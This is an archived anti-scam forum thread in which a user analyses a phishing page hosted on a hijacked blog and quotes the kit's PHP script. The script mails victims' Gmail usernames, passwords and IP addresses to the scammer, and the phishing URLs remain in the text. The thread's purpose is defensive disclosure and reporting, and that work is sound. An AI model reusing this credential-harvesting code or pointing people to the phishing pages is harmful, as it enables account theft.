SmartFeedSmartFeed          

WELCOME - YOU ARE CURRENTLY VIEWING 419EATER AS A GUEST

By joining our community you will have the ability to post topics and access other forums reserved for members. Registration is quick, simple and absolutely free. Join our community today by clicking here.

ScamWarners.com - Internet Anti-Fraud Center - now open!

These forums are READ ONLY. Click here to register on our new forums - aff.419eater.com

jasonsamuel.com

View next topic
View previous topic

This forum is locked: you cannot post, reply to, or edit topics.This topic is locked: you cannot edit posts or make replies.
zzz
Master Baiter

PostPosted: Wed Jun 27, 2012 9:29 am Reply with quoteBack to top

If you open www.jasonsamuel.com only it seems to be a normal blog. However the link I received in a scam email opens a page, saying:

Quote:
To access our online secured auction page,
you are required to choose your email address below

Here is the link:

http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm

It is safe to open it, it asks you to select an email provider, so after clicking the relevant icon a small form appears prompting for email and password.

This is 100% fake and the purpose is to collect email/password information from innocent victims.

I made a quick analysis and was able to download a ZIP file, containing the files hosted behind the malicious link. There are PHP (server-side) files, executed when the user clicks the "Sign in" button. Here is the contents of one of the PHP files:

Quote:
<?include 'index_files/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "---------------- XxX *~* HollYd*~* XxX----------------------\n";
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "----------------------------------Created By HollyD--------------------------------------\n";
$recipient = "[email protected]";
$subject = "Gma!l REZ";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?>

I can clearly see this code is constructing a message, containing the email and password entered by the victim, also the client IP address and some other stupid lines ("Created By HollyD"). Then this message is sent to the following address:

[email protected]

If anybody else wants to take a look, open the following link (it is safe):

http://www.jasonsamuel.com/fitness/properties/

It will open a directory contents, download the properties.zip file. The code listed above I extracted from gmail.php - the other php files in fact perform exactly the same thing - sending victim's email and password to this same email address:

[email protected]

What should be the course of action?

"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"

"You email has been received and from my understanding your email is not well understood."
B8er
Associate Boomdazzler

PostPosted: Wed Jun 27, 2012 10:57 am Reply with quoteBack to top

It's a phishing site, which we don't deal with here.

The best thing to do would be to report it to one (or more) of the email providers using their report phishing links - give them the http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm page so that they can see it is phishing for email passwords.

They will soon get it closed down.

Safari x 5 Tattoo Golden Pig Easter 2015 Vcamera
United KingdomUnited StatesNigeriaMalaysiaNetherlandsThailandCanadaUnited Arab EmiratesUnited NationsAustraliaSenegalSpainBeninChinaDenmarkGhanaIvory CoastKorean FlagSouth AfricaSwedenBurkina FasoCambodia FlagcameroonGermanyHong KongIndonesiaJapanNew ZealandSwitzerlandTogoTurkeyUkraine x 335 Elite Ninja Team Member Whip 🚽
Cellphone x 4 Closed lad accounts x 1746 x 1904 - Fake cheques: $4,392,620.83
Safari Team Woody - Ghana to Singapore - 11535km
zzz
Master Baiter

PostPosted: Wed Jun 27, 2012 11:07 am Reply with quoteBack to top

^^^ Reported to Google.

Can a mod close this thread please?

"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"

"You email has been received and from my understanding your email is not well understood."
woody999
Baiting Guru

PostPosted: Wed Jun 27, 2012 1:02 pm Reply with quoteBack to top

Marking as n/a and can be moved offline

"YOU NEED SOME DOCTOR" Barrister Peter Paul

I dont know who is lieing ,either you or F3lcha1r

is annoying to watch my email for a whole day and not read from you-
>178 Closed lad accounts x 200 Goat Easter Egg Purple Flower x2
United StatesNigeriaSpainUnited KingdomChinaGhanaUnited NationsThailandFilipino flagCambodia FlagcameroonGermanyMalaysiaSouth AfricaCanadaBeninRussiaFranceCayman IslandsLuxembourg
Ivory CoastBurkina FasoPortugalUnited Arab EmiratesTogoMexican FlagNetherlandsAustraliaIndonesiaSwitzerlandItalySenegalTurkeyJapanGibraltar
Peru : sri lanka : USVI : Oman x 5816
Cellphone x 45 Nurse Nastys Audi TT x2
This forum is locked: you cannot post, reply to, or edit topics.This topic is locked: you cannot edit posts or make replies.

Jump to:   

View next topic
View previous topic